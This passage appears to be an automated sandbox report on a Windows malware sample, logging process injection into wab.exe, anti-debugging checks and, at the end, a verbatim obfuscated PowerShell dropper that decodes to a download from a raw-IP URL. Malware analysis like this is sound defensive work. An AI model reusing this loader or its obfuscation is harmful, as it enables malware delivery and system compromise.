Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3967 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5934 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7123 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2632 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3336 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3512 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 2335 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1760 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 1802 Jump to behavior
Source: C:\Windows\System32\wbem\WMIADAP.exe Window / User API: threadDelayed 688 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.2 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100 Thread sleep time: -5534023222112862s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2004 Thread sleep count: 7123 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6912 Thread sleep count: 2632 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6932 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6424 Thread sleep count: 3336 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6568 Thread sleep count: 3512 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6568 Thread sleep time: -10536000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6568 Thread sleep count: 2335 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 6568 Thread sleep time: -7005000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread sleep count: Count: 3336 delay: -5 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_230110F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_230110F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW, 13_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 15_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00418981 memset,GetSystemInfo, 13_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WCN\en-GB\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en-US\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\en\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Examples\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\ Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\ Jump to behavior
Source: wab.exe, 00000009.00000002.2926027586.0000000007072000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2926027586.0000000007088000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wab.exe, 00000009.00000002.2926027586.0000000007043000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP4
Source: powershell.exe, 00000001.00000002.2254070611.000001FD5D28A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23018EC8 LdrInitializeThunk, 9_2_23018EC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23012639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_23012639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 13_2_004044A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23014AB4 mov eax, dword ptr fs:[00000030h] 9_2_23014AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2301724E GetProcessHeap, 9_2_2301724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23012B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_23012B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_23012639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_23012639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_230160E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_230160E2

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3CA0000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2A3FD70 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko Ne, G.id$T.ic ';Landlers (Forkber 'S.ec$ ,fbgGgeplAfreoSekrbEquaaCardlTarp: LivDAtmoiLazasPraiiAllonpre t VareBuksg ,elrImpreUngar K.seT.trt Cor= Pai(Snevc Cham ,atdSpec .da/MashcSkuf .cu$Pul,HConfoMyc,mHypee PrioBevakdksli Bu n Buse eaktHolyiTrkkcGebr)L,bb ');Landlers (Forkber 'Grac$ .isgViadl SunoSovibUnfrareaclBuff:.aabPBefalfripaBindsF,rgtKajsi .acc,ildkRdklo P,rr .attProce PletStif7Pali=D.ba$Ki kBKph e osesGazek D gfTakstMon,i ,oegSt,ueNectl ClasKommeMarcsPrettConveUntrrBjr.aP,ivpLeveiConsenysarKnyssOver.SkemsGargp Ac lPagii KlatB,ad(Mado$AvanHGa go PollSauno rgm Phye.rsktFodba erb UnioDiarlSubby,idu)chia ');$Beskftigelsesterapiers=$Plastickortet7[0];Landlers (Forkber 'Robu$navngTagel MeloSc ebbeb.aFanel ube: lilP.igra,rilp ksia.rimlhur iWh.msModvtTaa.iProtcPala=.ronNBacoeAmphwKonf-Tra.OPre,b.arrjI.veeAppecIndvt Sup R,sSHal.yJol sMegatCausematmmTeak. StaNSa.ae .netTikr.VansWOffpeoverbRegiCGlycl Au,iFrugeThernFredtstac ');Landlers (Forkber 'Milj$BungP p.oaBou,pVulgaKnitlForsiTromsKonft FodiVrn.cInco.UsanHTou eKirtage,edRubieInf,r St s,ygi[Over$ OesoImpep,hags.rimtOpinrVenemSurssAcce]Unce=,olo$CantP StaeNonnnEne,tFai.aEff n BendKir,r.ggliSubfaTr.unAf o ');$Brudekjolernes=Forkber ' CenP neuaSacrpGleraDeltlFirei.ulcs klstLunciSo tcLugd.UnalD nfooVariwCollnColulwhooo Fa,aUb bdHydrFPel iImprl Su.ePhyt(Gluc$PlurBstr e .orsHjemkEx mfLes,tSkadiHe.tgArthe akulPan.sMerce Vals VertS.foePuybrA,lwaLgehpMu,di ProesporrNonasL kk,Kric$WholFThy l DimePrectAerooGlycp.orteAfm.rRadia L,vtHut.iLingoSk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Guanamine9.jud && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Disclosed = 1;$Urbaniserendes='Substrin';$Urbaniserendes+='g';Function Forkber($faktotummets){$Chevee=$faktotummets.Length-$Disclosed;For($Forsmaaendes=4; $Forsmaaendes -lt $Chevee; $Forsmaaendes+=(5)){$Diplomaterne+=$faktotummets.$Urbaniserendes.Invoke($Forsmaaendes, $Disclosed);}$Diplomaterne;}function Landlers($Heelless){. ($privatdetektiv) ($Heelless);}$Pentandrian=Forkber 'PrakMIntoo huczLangiCl,nlLizilLeopaTeen/Ti h5 Apo.Wise0Wair Biko(.yriWM rciCardnBrevdDiscoEkspw ,lisVeja quifNGeroTSome Modv1D wn0Suld. .eg0Outh;Foug CandWGsliiP.eonS es6Uro 4Adju; Apo Ov.xCo,c6 For4M sa;Skri ,arar.ubrvBere:Tr.e1Lapa2a.sc1Br,i. Fag0Sk,o)Hnge AmmoGGl eePantcDehykForgoButi/A,dr2Toem0Dict1Forb0Kold0Supe1Hane0Br.m1Beod sponFSemiiShear HypeP,infTranoM.crxAu o/ Per1Tilt2 .it1Intr.Saar0Ban ';$opstrms=Forkber 'PersUPsovs Mase Oger ,aa-BagsAfriggUdvleAffunRoyctJarn ';$Beskftigelsesterapiers=Forkber ' hulhstrutEftetTre,prids:axo,/Deci/ ver8Tros7Bek . Qua1 ewh2Lemm1 alf.Pyth1Ca.e0Cry,5Supe.Unce1Saxo6Pro 3 Ant/.eewHFloey PanlAnt askipsKonomNo,eu prosTele. FreoUnmocIncoxInte ';$Holometaboly=Forkber 'Fili> afe ';$privatdetektiv=Forkber 'Bek iGenee Besx Ur ';$Homeokinetic = Forkber ' ArbeDaphcCoenh NonoAk i Mat %StigaS,etp JovpArchdChokaJewet Ca a,seg%S.an\ CenGUnsauPreta As.nPanca katmGoldiWav.nPreleVitt9Fyr..Tar j Uddu esedStav Hykl&Menk&Trun MaineGoddc Dath reko 